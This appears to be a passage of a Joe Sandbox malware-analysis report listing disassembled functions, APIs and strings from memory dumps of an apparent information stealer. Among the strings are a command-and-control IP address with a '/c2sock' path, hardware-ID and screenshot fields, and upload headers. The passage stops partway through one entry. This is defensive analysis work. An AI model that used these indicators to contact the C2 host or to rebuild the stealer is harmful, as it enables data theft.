Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
Instruction ID: a368c7a5dfb214292b8ef9e9d0bae651ecd455d0456980d3106c0b1a917b6dbd
Opcode Fuzzy Hash: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
Instruction Fuzzy Hash: 9DF06DB1900644DFD710DF99E989B5AFBF8EB48724F10C16AE4289B751D33C5844CF68

Function 0044FB15 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
Instruction ID: c1995cbfc35cf923d3c3ea23a15c0124f92d8ae5a77ba2b7d44262ced24471db
Opcode Fuzzy Hash: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
Instruction Fuzzy Hash: AFE08C72912278EBCB15DB89C945D8AF3FCEB49B14B2500ABB501D3200C674EE04CBD4

Function 00443998 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
Instruction ID: 17c6e2c9dd4ac5a7344e966d1587fdb4c68b9ede7c11da59021095b760417012
Opcode Fuzzy Hash: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
Instruction Fuzzy Hash: 09C08C7410098046EF298D10C271BA63364FBA2BCBF8005CEC4420BB46C66EAD8AD654

Function 0042F625 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 418
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(?,?), ref: 0042F9A2
lstrcatW.KERNEL32(?,?), ref: 0042F9CF
lstrcatW.KERNEL32(?,0045E102), ref: 0042FA7D
lstrcatW.KERNEL32(?,0045E102), ref: 0042FAFF

Strings

n_v, xrefs: 0042FCCB
)lu, xrefs: 0042FCC2
n_v, xrefs: 0042FD1C
)lu, xrefs: 0042F81C
(lu, xrefs: 0042F811
n_v, xrefs: 0042FAAD

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: (lu$)lu$)lu$n_v$n_v$n_v
API String ID: 4038537762-1534030094
Opcode ID: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
Instruction ID: 4b57ba66ae2396d09571da8aec8c9542c80e7c55b9c92ca3ddc1ba6dd1b7a9a6
Opcode Fuzzy Hash: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
Instruction Fuzzy Hash: 7AF11D71B0012E9BCF289F99E8515BEBAB4FB54310FE44537E401EA3B0D37989469B4B

Function 0041A28F Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 444
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wctomb_s.LIBCMT ref: 0041A498

Strings

/c2sock, xrefs: 0041A814
hwid, xrefs: 0041A655
GhYuIq, xrefs: 0041A67A
lid, xrefs: 0041A67F
pid, xrefs: 0041A669
94.158.244.69, xrefs: 0041A910
file, xrefs: 0041A6E9

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: _wctomb_s
String ID: /c2sock$94.158.244.69$GhYuIq$file$hwid$lid$pid
API String ID: 2865277502-1332857675
Opcode ID: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
Instruction ID: cc35308ceb474d8d45e9bf1619109491d7752d3a10985d79ac983763bc7ee506
Opcode Fuzzy Hash: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
Instruction Fuzzy Hash: 11F108B5D0211A9BDF248B88C8455FEBAB1AB14340F24496BE415F7394D33DCAE18B9F

Function 0088003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0088024D

Strings

cess, xrefs: 0088018D
kernel32.dll, xrefs: 0088008F, 00880095

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: aac36b1d1735d88017c5ffbfa41392513043c77e30cf763340a148cb817e5263
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 3D527974A01229DFDBA4DF58C984BA8BBB1BF09304F1480D9E50DAB351DB30AE88DF15

Function 00432718 Relevance: 10.7, APIs: 7, Instructions: 234
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateCompatibleDC.GDI32(00000D62), ref: 00432894
DeleteDC.GDI32(00000002), ref: 00432B01
DeleteObject.GDI32(?), ref: 00432B0A

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: Delete$CompatibleCreateObject
String ID:
API String ID: 1022343127-0
Opcode ID: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
Instruction ID: 50fedbdf880eafc0b33480be7e0390951b775b57d16ab65b209ae7f2f2027e24
Opcode Fuzzy Hash: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
Instruction Fuzzy Hash: 358116B590031A9BDF209F948EC557E7A74BB0C350F282617E510F63A0D3FD9A419BAB

Function 0044CF15 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,0044D022,?,00426F52,00000000,00000000,?,?,0044CDD6,00000021,FlsSetValue,0046503C,FlsSetValue,00000000), ref: 0044CFD6

Strings

ext-ms-, xrefs: 0044CF80
api-ms-, xrefs: 0044CF6C

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
Instruction ID: c6a9518bbc4403065455c8dc6532f837efe444071a0c6fa5154c8577c36c6d79
Opcode Fuzzy Hash: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
Instruction Fuzzy Hash: 4521EE31E47210ABEB219B65DCC0A5B77699B41764B190122FD05A73D0FBBCDD08C6DD

Function 0044575F Relevance: 9.3, APIs: 6, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__allrem.LIBCMT ref: 004458F2
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044590E
__allrem.LIBCMT ref: 00445925
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445943
__allrem.LIBCMT ref: 0044595A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445978

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
Instruction ID: 558deed22b9213933cb6ee14014e535275a7d7dbd354c33e6b5693a62e892da8
Opcode Fuzzy Hash: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
Instruction Fuzzy Hash: 0681D8B1600B06DBFB20AE29CC42B5BB3E9AF54768F24452FE411D67C3E778D9058B58

Function 00433C10 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 252COMMON

Download Yara Rule

Strings

9a%^, xrefs: 00433D03
M%, xrefs: 00433D93
Screen.png, xrefs: 00433F6F

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: 9a%^$M%$Screen.png
API String ID: 0-2021954137
Opcode ID: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
Instruction ID: 11fefa64aaa65e2afc3480572e0d96af9cd0f56f536a59b59af3bc8bd9e58722
Opcode Fuzzy Hash: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
Instruction Fuzzy Hash: 4691D8B6E005098ADF248E98888557EB6B4AB9C312F647917E416FB390E37CCF41875B

Function 00402FCC Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 283libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll), ref: 00402FE0
LoadLibraryA.KERNELBASE(my-global-render.dll), ref: 00402FEA

Strings

my-global-render.dll, xrefs: 00402FE5
advapi32.dll, xrefs: 00402FDB

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: advapi32.dll$my-global-render.dll
API String ID: 1029625771-772900288
Opcode ID: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
Instruction ID: f2405b5e0aceb9a51e137d87bf907524102569514c3531be8be57496d61f3bc2
Opcode Fuzzy Hash: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
Instruction Fuzzy Hash: 6BA1F872D0412A86CF64CE98994527E6E78BB10351F250A3BE915FA3D0C7BCCF41A79B

Function 004338B5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 200COMMON

Download Yara Rule

Strings

^^4, xrefs: 004339F5
~rjz, xrefs: 0043399A
^^4, xrefs: 00433A0A

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: ^^4$^^4$~rjz
API String ID: 0-2511145224
Opcode ID: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
Instruction ID: fe384b451c266d20576388885646b2b98754c57df49fd09348afa64f247ec54d
Opcode Fuzzy Hash: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
Instruction Fuzzy Hash: 9E618C72E0011947EF287D4888855BEB7919B88B1AF342927F115FB391C76C8F4D974B

Function 00453B82 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36

Part of subcall function 00453203: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045769E,?,00000000,-00000008), ref: 004532AF

Strings

Eastern Summer Time, xrefs: 00453CE3
Eastern Standard Time, xrefs: 00453CCF

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ByteCharInformationMultiTimeWideZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 1123094072-239921721
Opcode ID: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
Instruction ID: af1a61733d26d89116c9bb65ccd9636383a7b5e966e3c510a6c9de8ec0de26fa
Opcode Fuzzy Hash: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
Instruction Fuzzy Hash: FC4199B2D00115BBDB106FA6DC46A5ABF78EF04396F10406BFD04A7162E7789F148B99

Function 004439BA Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0044387B,?,00443A9B,00000000,?,?,0044387B,2263B8EC,?,0044387B), ref: 004439CB
TerminateProcess.KERNEL32(00000000,?,00443A9B,00000000,?,?,0044387B,2263B8EC,?,0044387B), ref: 004439D2
ExitProcess.KERNEL32 ref: 004439E4

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
Instruction ID: af00403c123718aebf8df8255158ed5eb80799a0d3dec5c869f97e29736db2e2
Opcode Fuzzy Hash: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
Instruction Fuzzy Hash: 7ED09E71404115BBEF113F61DC0E9593F2AAF40787B144029F90596132DFF59E51DB99

Function 0041D057 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(00000000,?,?,0041A650), ref: 0041D07D

Strings

advapi32.dll, xrefs: 0041D06A

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: CurrentProfile
String ID: advapi32.dll
API String ID: 2104809126-4050573280
Opcode ID: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
Instruction ID: 6db1735cda00ed3d220bfaf1cacc4b3e5e01bff1461a9ef13bbd23f8b442f0e3
Opcode Fuzzy Hash: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
Instruction Fuzzy Hash: 9BF0E9F3D4013126F61025AA5C01ABB7E888B46729F140177FD0CE6281E21E9D8242EA

Function 0044E224 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
Instruction ID: f015b3b87cbc766378ce5f0d68a15eb43446f93644205f51174f0ce78f182e30
Opcode Fuzzy Hash: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
Instruction Fuzzy Hash: 3AE08631100214ABEF112BA2AD0AB5A3B9CBF80355F104065F60896161EBB88850C7DD

Function 00880E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00880223,?,?), ref: 00880E19
SetErrorMode.KERNELBASE(00000000,?,?,00880223,?,?), ref: 00880E1E

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: f2f6d8dcacfc00e91535e2c3d4d44eba824c5639ec75f1ad12dbbdf9da4bc129
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: D6D0123114512877D7403A94DC09BCE7B1CDF05B62F008411FB0DD9080C770994047E5

Function 00418BA2 Relevance: 1.8, APIs: 1, Instructions: 313COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00418BDF

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
Instruction ID: 1d70213f864448114667fa93143398f689e43ce09380febb34e55b8e9c3c6d32
Opcode Fuzzy Hash: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
Instruction Fuzzy Hash: AEC1ECB1A05B009FD724CF29C88166BFBE5FF88314F14892EE5AA83750E774E845CB56

Function 0044CFE0 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
Instruction ID: 373710123005f16d466fbf61102d91235a16be84b9ed3eb2ab6254e0a7e141d7
Opcode Fuzzy Hash: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
Instruction Fuzzy Hash: B6016D33B001145FBF11CE69EC4595B3796EBC1328B244132F904CB185FB39CC028389

Function 0045699F Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0044EB6F: RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1

RtlReAllocateHeap.NTDLL(00000000,00000000,00413871,00000000,00000000,00000000,00413871,00000000,00000000,76FCF770,?,0041A136,00001FE6,00003CA7,?,000016E5), ref: 004569FC

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
Instruction ID: a5a40cd43560794f83e54c6bbfcb227c9197063c5c667a14a31a2b77de81b9f8
Opcode Fuzzy Hash: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
Instruction Fuzzy Hash: 80F0C8B110011576AB212A279C01B6B276C9FC1B76F56013FFC1497293EE7C9809C29E

Function 00450330 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044D36A,00000001,00000364,00000000,00000008,000000FF,?,00447A98,00426F52,?,?), ref: 00450371

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
Instruction ID: 035a614d3876f6906020b157cdd10206fdefeae5334def747215f66390aa104c
Opcode Fuzzy Hash: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
Instruction Fuzzy Hash: BBF05939200620A7AB205B728C01B6B3758AF81772B044127FC08DA282DA38DC09C6EE

Function 0044EB6F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
Instruction ID: b54a30de40d39881521df567edad888a5efcf5dcf9e065f2953d68bc5b8e4da5
Opcode Fuzzy Hash: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
Instruction Fuzzy Hash: 3AE0E5212001A56AFA30A767CC01B6B3A4DFF417B8F010037ED47A62D1DBACEC0285AE

Function 00979F3D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00979F8E

Memory Dump Source

Source File: 00000000.00000002.3107115385.0000000000979000.00000040.00000020.00020000.00000000.sdmp, Offset: 00979000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_979000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: e98bbdde4d5c380ec7f594f9296c0412966f8781bb79180ba125d396ed871967
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 9F112879A00208EFDB01DF98C985E98BBF5EF48350F05C0A4F9489B362D371EA90DB80

Non-executed Functions

Function 0088BA83 Relevance: 42.2, APIs: 5, Strings: 18, Instructions: 1922stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0088C7E8
lstrlenW.KERNEL32(00001A2F), ref: 0088CB68
lstrlenW.KERNEL32(00001A2F), ref: 0088DA8D

Strings

L2&e, xrefs: 0088D262
Ku^%, xrefs: 0088D66E
{#9, xrefs: 0088BBF6
Ku^%, xrefs: 0088D9EC
K2&e, xrefs: 0088C4C9
Y=`, xrefs: 0088D2E4
"B!H, xrefs: 0088CF92
Ku^%, xrefs: 0088C74A
L2&e, xrefs: 0088CCE4
{#9, xrefs: 0088C8F1
Ku^%, xrefs: 0088BFB1
Y=`, xrefs: 0088C1CC
Y[[T, xrefs: 0088BCAE
Ku^%, xrefs: 0088C0FA
Ku^%, xrefs: 0088D45C
Ku^%, xrefs: 0088D552
"B!H, xrefs: 0088C285
bi, xrefs: 0088BF40

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$Y[[T$bi${#9${#9$Y=`$Y=`
API String ID: 1659193697-3907602706
Opcode ID: b550c6edbfc739eb8f81f84309a248c2000b550dd3d445275482cde3558858bf
Instruction ID: 9e83f0dfd3f8611c1eddd0fc66168851e42fb5cb147ded4b9c386802d3003e78
Opcode Fuzzy Hash: b550c6edbfc739eb8f81f84309a248c2000b550dd3d445275482cde3558858bf
Instruction Fuzzy Hash: D2F207B1D0171A8BDF38AB5889456BEBBB0FB54324F24452AE515FB3D0E3708E449B93

Function 008B10D3 Relevance: 29.4, APIs: 7, Strings: 9, Instructions: 1432memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 008B11AC
RtlAllocateHeap.NTDLL(?,00000008,00000028), ref: 008B1752
GetDIBits.GDI32(?,00000001,00000000,?,?,00000001,00000000), ref: 008B2461
ReleaseDC.USER32(00000000,?), ref: 008B246B

Strings

TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 008B1B11, 008B1CB2
y_B>, xrefs: 008B2494
q7 C, xrefs: 008B1A50
TT4, xrefs: 008B23AE
TT4, xrefs: 008B168C
$jRk, xrefs: 008B1632
?, xrefs: 008B283A
q7 C, xrefs: 008B1200
y_B>, xrefs: 008B1735

Memory Dump Source

Source File: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: AllocateHeap$BitsRelease
String ID: $jRk$?$TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$TT4$TT4$q7 C$q7 C$y_B>$y_B>
API String ID: 2392854675-2009061895
Opcode ID: 0fe5284bdf45d83cd6d71459b9714451c746a96b2f378b9609cc4e18fca22abc
Instruction ID: 81f1d4c0542d77f3467d93ec78a38f4830241697e653dd94809017b3fe2d4a8d
Opcode Fuzzy Hash: 0fe5284bdf45d83cd6d71459b9714451c746a96b2f378b9609cc4e18fca22abc
Instruction Fuzzy Hash: 96C20275D0021ACBCF28EB98C9996FEBBB4FB14304F60452AE515EF350D7358A81CB96

Function 0041B251 Relevance: 28.9, APIs: 6, Strings: 10, Instructions: 942COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0041B77B
_strlen.LIBCMT ref: 0041BA1C
_strlen.LIBCMT ref: 0041C1E5
_strlen.LIBCMT ref: 0041C1FD

Strings

A@6e, xrefs: 0041B516
A@6e, xrefs: 0041C0F4
Content-Type: attachment/x-object, xrefs: 0041B8FA
ilen, xrefs: 0041B883
SqDe87817huf871793q74, xrefs: 0041BCD2
RY30, xrefs: 0041B48D
^^4, xrefs: 0041BDB0
ame=, xrefs: 0041B87B
Content-Disposition: form-data; name=", xrefs: 0041C185
^^4, xrefs: 0041B7EA

Memory Dump Source

